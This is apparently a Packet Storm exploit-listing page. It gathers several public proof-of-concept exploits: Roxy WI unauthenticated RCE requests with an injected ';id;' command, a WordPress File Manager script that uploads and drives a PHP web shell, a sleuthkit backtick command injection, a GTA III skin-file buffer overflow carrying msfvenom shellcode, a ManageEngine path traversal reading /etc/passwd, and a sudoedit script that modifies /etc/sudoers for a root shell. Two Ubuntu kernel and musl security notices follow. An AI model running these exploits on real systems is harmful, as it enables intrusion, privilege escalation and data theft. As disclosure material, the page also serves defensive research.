Roxy WI version 6.1.0.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31126# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 73Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

Roxy WI 6.1.0.0 Remote Code Execution

WordPress File Manager plugin versions 6.0 through 6.9 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE# Date: [ 22-01-2023 ]# Exploit Author: [BLY]# Vendor Homepage: [https://wpscan.com/vulnerability/10389]# Version: [ File Manager plugin 6.0-6.9]# Tested on: [ Debian ]# CVE : [ CVE-2020-25213 ]import sys,signal,time,requestsfrom bs4 import BeautifulSoup#from pprint import pprintdef handler(sig,frame):  print ("[!]Saliendo")  sys.exit(1)signal.signal(signal.SIGINT,handler)def commandexec(command):  exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  params = {    "cmd":command  }  r=requests.get(exec_url,params=params)  soup = BeautifulSoup(r.text, 'html.parser')  text = soup.get_text()  print (text)def exploit():  global url  url = sys.argv[1]  command = sys.argv[2]  upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  headers = {      'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",      'Connection': "close"   }  payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  try:    r=requests.post(upload_url,data=payload,headers=headers)    #pprint(r.json())    commandexec(command)  except:    print("[!] Algo ha salido mal...")def help():  print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")if __name__ == '__main__':  if len(sys.argv) != 3:    help()  else:    exploit()

WordPress File Manager 6.9 Shell Upload

Sleuthkit version 4.11.1 suffers from a command injection vulnerability.

    # Exploit Title: sleuthkit 4.11.1 - Command Injection  # Date: 2023-01-20# CVE-2022-45639# Vendor Homepage: https://github.com/sleuthkit# Vulnerability Type: Command injection# Attack Type: Local# Version: 4.11.1# Exploit Author: Dino Barlattani, Giuseppe Granato# Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639# POC:fls tool is affected by command injection in parameter "-m" when run onlinux system.OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allowsattackers to execute arbitrary commandsvia a crafted value to the m parameterwhen it run on linux, a user can insert in the -m parameter a buffer withbacktick with a shell command.If it run with a web application as front end it can execute commands onthe remote server.The function affected by the vulnerability is "tsk_fs_fls()" from the"fls_lib.c" file#ifdef TSK_WIN32   {   ....   }#else   data.macpre = tpre; <---------------   return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);#endifRun command:$ fls -m `id` [Options]-- *Dino Barlattani*www.linkedin.com/in/dino-barlattani-10bba11a9/www.binaryworld.it <http://Binaryworld.it>www.youtube.com/user/dinbar78

Sleuthkit 4.11.1 Command Injection

Roxy WI version 6.1.0.0 suffers from an improper authentication control vulnerability.

    # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31125# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 105Origin: https://192.168.56.114Dnt: 1Referer: https://192.168.56.114/app/login.pySec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closealert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

Roxy WI 6.1.0.0 Improper Authentication Control 

SQL Monitor version 12.1.31.893 suffers from a cross site scripting vulnerability.

    # Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC]# Exploit Author: [geeklinuxman@gmail.com]# Vendor Homepage: [https://www.red-gate.com/]# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]# Version: [SQL Monitor 12.1.31.893]# Tested on: [Windows OS]# CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl inhttps://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker tohijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious AHTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.

SQL Monitor 12.1.31.893 Cross Site Scripting

Grand Theft Auto III with Vice City Skin File version 1.1 suffers from a buffer overflow vulnerability.

    # Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow # Exploit Date: 22.01.2023# Discovered and Written by: Knursoft# Vendor Homepage: https://www.rockstargames.com/# Version: v1.1# Tested on: Windows XP SP2/SP3, 7, 10 21H2# CVE : N/A#1 - Run this python script to generate "evil.bmp" file.#2 - Copy it to [Your Game Path]\skins.#3 - Launch the game and navigate to Options > Player Setup and choose skin"evil".#4 - Buffer Overflow occurs and calc.exe pops up!#msfvenom -p windows/exec CMD="calc.exe"buf =  b""buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65"buf += b"\x00"#any shellcode should work, as it seems there is no badcharsver = 0 #set to 1 if you want it to work on GTA III steam versionesp = b"\xb9\xc5\x14\x21" #mss32.dll jmp espbmphdr =b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"#generic bmp headerpayload = bmphdrpayload += b"\x90" * 1026if ver == 1:    payload += b"\x90" * 112payload += esppayload += b"\x90" * 20 #paddingpayload += bufwith open("evil.bmp", "wb") as poc:    poc.write(payload)

Grand Theft Auto III Vice City Skin File 1.1 Buffer Overflow

ManageEngine Access Manager Plus version 4.3.0 suffers from a path traversal vulnerability.

    ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal## Author: nu11secur1ty## Date: 11.22.2023## Vendor: https://www.manageengine.com/## Software: https://www.manageengine.com/privileged-session-management/download.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)## Description:The `pmpcc` cookie is vulnerable to path traversal attacks, enablingread access to arbitrary files on the server.The testing payload..././..././..././..././..././..././..././..././..././..././etc/passwdwas submitted in the pmpcc cookie.The requested file was returned in the application's response.The attacker easy can see all the JS structures of the server and canperform very dangerous actions.## STATUS: HIGH Vulnerability[+] Exploits:```GETGET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1Host: localhost:9292Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Mobile: ?0X-Requested-With: XMLHttpRequestSec-CH-UA-Platform: WindowsReferer: https://localhost:9292/AMPHome.html```[+] Response:```,'js.pmp.helpCertRequest.subcontent10':'The issued certificate ise-mailed to the user who raises the request, the user who closes therequest and also to those e-mail ids specified at the time of closingthe request.','js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username','js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Nextsynchronization is scheduled to run on','js.agent.csharp_Windows_Agent':'C# Windows Agent','js.PassTrixMainTab.in_sec':'Seconds','godaddy.importcsr.selectfileorpastecontent':'Either select a file orpaste the CSR content.','js.connection.colors':'Colors','js.general.ShareToGroups':'Share resource to user groups','js.connection.mapdisk':'Drives','jsp.admin.Support.User_Forums':'User Forums','js.general.CreateResource.Dns_url_check':'Enter a valid URL . Forcloud services (Rackspace and AWS IAM), the DNS name <br>looks like aURL (ex:  https:\/\/identity.api.rackspacecloud.com\/v2.0)','js.admin.RPA_Integration.About':'PAM360 renders bots that seamlesslyintegrate and perfectly fit into the pre-designed and automatedintegrations of the below listed RPA-powered platforms, to simulatethe routine manual password retrieval from the PAM360 vault.','js.discovery.loadhostnamefromfile':'From file','js.AddListenerDetails.Please_enter_valid_implementation_class':'Pleaseenter a valid Implementation Class','js.general.GroupedResources':'Grouped Resources','js.general.SlaveServer':'This operation is not permitted in Secondary Server.','PROCESSID':'Process Id','js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Servicesfetched successfully','assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled','js.commonstr.search':'Search','js.discovery.usercredential_type':'Credential Type','jsp.admin.GeneralSetting.Check_high_availability_status_for':'Checkhigh availability status every <input type=\"text\" class=\"txtbox\"name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"> minutes.','pki.js.help.entervalidnumber':'Please enter a valid number forNumeric Field Default Value.','js.remoteapp.fetch':'Fetch','js.admin.HighAvailability.configured_successfully':'Configured Successfully','js.generalSettings_searchTerm_Password_reset':'Password Reset,Reason for password reset, disable ticket id, waiting time, wait timefor service account password reset, linux unix password reset','letsencrypt.enter.domainnames':'Enter domain names','js.discovery.resourcetype':'Resource Type','js.HomeTab.UserTab':'Set this tab as default view for \'Users\'','js.report.timeline.todate':'Valid To','js.general_Language_Changed_Successfully':'Language Changed Successfully','js.aws.credentials.label':'AWS Credential','auditpurge.helpnote1':'Enter 0 or leave the field blank to disablepurging of audit trails.','js.general.user.orgn_bulkManage':'Manage Organization','js.rolename.SSH_KEY':'Create\/Add key','js.admin.admin.singledbmultiserver.name':'Application Scaling','lets.encrypt.requestreport':'Let\'s Encrypt Requests Report','js.settings.breach_settings.disable_api':'Disable API Access','js.cmd.delete.not_possible':'Command cannot be deleted as it isalready added to the following command set(s).','js.settings.notification.domaincontent':'Notify if domains areexpiring within','js.aws.searchuser':'--Search UserName--','jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketingsystem settings in Admin >> General >> Ticketing System Integration.','js.discovery.port':'Gateway Port','usermanagement.showCertificates':'Show Certificates','js.general.DestinationDirectoryCannotBeEmpty':'Destination directorycannot be empty','js.sshreport.title':'SSH Resource Report','js.encryptionkey.update':'Update','js.aws.regions':'Region','js.settingsTitle1.UserManagement':'User Management','js.passwordPolicy.setRange':'Enforce minimum or maximum password length','js.commonstr.selectResources':'Select Resources','RULENAME':'Rule Name','jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'UserGroup added successfully','js.reports.SSHReports.title':'SSH Reports','js.CommonStr.ValueIsLess':'value is less than 2','js.discovery.discoverystatus':'Discovery Status','js.settings.security_settings.Web_Access':'Web Access','js.general.node_name_cannot_be_empty':'Node name cannot be empty','js.deploy.audit':'Deploy Audit','js.agentdiscovery.msca.title':'Microsoft Certificate Authority','jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominateuser group(s) to exempt from access control.','js.pki.SelectCertificateGroup':'Select Certificate Group(s)','js.admin.HighAvailability.High_Availability_status':'Status','settings.metracker.note0':'Disable ME Tracker if you do not wish toallow ManageEngine to collect product usage details.','SERVICENAME':'Service Name','settings.metracker.note1':'Access Manager Plus server has to berestarted for the changes to take effect.','js.general.NewPinMismatch':'New PIN Mismatch','js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'','java.ScheduleUtil.minutes':'minutes','js.admin.sdpop_change.tooltip':'Enabling this option will requireyour users to provide valid Change IDs for the validation of passwordaccess requests and other similar operations. Leaving this optionunchecked requires the users to submit valid Request IDs forvalidation.','js.privacy_settings.title.redact':'Redact','js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25resources can be selected','js.aboutpage.websitetitle':'Website','js.customize.NumericField':'Numeric Field','js.please.select.file':'Please select a file to upload.','js.AutoLogon.Remote_connections':'Remote Connections','pki.snmp.port':'Port','java.dashboardutils.TODAY':'TODAY','js.schedule.starttime':'Start Time','js.ssh.keypassphrase':'Passphrase','js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus','js.analytics.tab.ueba.msg4':'guide','js.analytics.tab.ueba.msg5':'to complete the integration. For anyfurther questions, please write to us atpam360-support@manageengine.com.','js.reportType.Option7.UserAuditReport':'Audit Report','js.common.csr':'CSR','js.globalsign.reissue.order':'Reissue Order','js.analytics.tab.ueba.msg6':'Build a platform of expected behaviorfor individual users and entities by mapping different user accounts','js.analytics.tab.ueba.msg7':'Verify actionable reports thatsymbolize compromise with details about actual behavior and expectedbehavior.','js.resources.importcredential':'Import Credentials','js.analytics.tab.ueba.msg1':'The Advanced Analytics module forPAM360, offered via ManageEngine Log360 UEBA, analyzes logs fromdifferent sources, including firewalls, routers, workstations,databases, file servers and cloud services. Any deviation from normalbehavior is classified as a time, count, or pattern anomaly. It thengives actionable insight to the IT Administrator with the use of riskscores, anomaly trends, and intuitive reports.','js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:','js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360instance, download Log360 UEBA from the below link and follow theinstructions in this','js.settingsTitle2.MailServer':'Mail Server','jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'ManagingAMP Encryption Key','settings.unmappedmails.email':'E-mail Address','amp.connection.connection_type':'Connection Type','js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior basedon activity time, count, and pattern.','godaddy.contactphone':'Contact Phone','js.general.HelpDeskIntegrate.ClassSameException':'Class name alreadyimplemented. Implement with some other class.','js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors inWindows devices, SQL servers, FTP servers, and network devices such asrouters, firewalls, and switches.','js.rolename.freeCA.acme':'ACME','digicert.label.dcv.cname':'CNAME Token','js.helpcontent.createuser':'User Creation ','pgpkeys.key.details':'Key Information','js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status','js.HomeTab.TaskAuditView':'Task Audit','pki.js.certs.certGroupsSharedByUserGroups':'Certificate GroupsShared With User Group(s)','js.common.importcsr.format':'(File format should be .csr)','js.notificationpolicy.Submit':'Save','pmp.vct.User_Audit_Configuration':'User Audit Configuration'.........```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))## Reference:[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)## Proof and Exploit:[href](https://streamable.com/scdzsb)## Time spent`03:00:00`

ManageEngine Access Manager Plus 4.3.0 Path Traversal

sudo versions 1.8.0 through 1.9.12p1 local privilege escalation exploit.

    #!/usr/bin/env bash# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation# Exploit Author: n3m1.sys# CVE: CVE-2023-22809# Date: 2023/01/21# Vendor Homepage: https://www.sudo.ws/# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz# Version: 1.8.0 to 1.9.12p1# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9## Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc## Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine.## The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the# attacker to add a line to gain privileges on all the files and get a root # shell.if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'then    echo "> Currently installed sudo version is not vulnerable"    exit 1fiEXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '$root$|$ALL$|$ALL : ALL$' | cut -d ')' -f 2-)if [ -z "$EXPLOITABLE" ]; then    echo "> It doesn't seem that this user can run sudoedit as root"    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2else    echo "> BINGO! User exploitable"    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"    echo "$( whoami ) ALL=(ALL:ALL) ALL"    read -n 1 -s -r -p "Press any key to continue..."    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE    sudo su root    exit 0fi

sudo 1.9.12p1 Privilege Escalation

Ubuntu Security Notice 5991-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5991-1  
March 31, 2023

linux-gcp-4.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1147-gcp     4.15.0-1147.163  
   linux-image-gcp-lts-18.04       4.15.0.1147.161

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5991-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1147.163

Ubuntu Security Notice USN-5991-1

Ubuntu Security Notice 5990-1 - It was discovered that musl did not handle certain i386 math functions properly. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, and Ubuntu 18.04 LTS. It was discovered that musl did not handle wide-character conversion properly. A remote attacker could use this vulnerability to cause resource consumption , denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5990-1March 31, 2023musl vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 ESM- Ubuntu 18.04 ESM- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in musl.Software Description:- musl: standard C libraryDetails:It was discovered that musl did not handle certain i386 math functionsproperly. An attacker could use this vulnerability to cause a denial ofservice (crash) or possibly execute arbitrary code. This issue onlyaffected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, and Ubuntu 18.04 LTS.(CVE-2019-14697)It was discovered that musl did not handle wide-character conversionproperly. A remote attacker could use this vulnerability to cause resourceconsumption (infinite loop), denial of service, or possibly executearbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04ESM, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2020-28928)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 ESM:musl 1.1.24-1ubuntu0.1~esm1musl-dev 1.1.24-1ubuntu0.1~esm1Ubuntu 18.04 ESM:musl 1.1.19-1ubuntu0.1~esm1musl-dev 1.1.19-1ubuntu0.1~esm1Ubuntu 16.04 ESM:musl 1.1.9-1ubuntu0.1~esm3musl-dev 1.1.9-1ubuntu0.1~esm3Ubuntu 14.04 ESM:musl 0.9.15-1ubuntu0.1~esm2musl-dev 0.9.15-1ubuntu0.1~esm2In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-5990-1CVE-2019-14697, CVE-2020-28928

Source

Packet Storm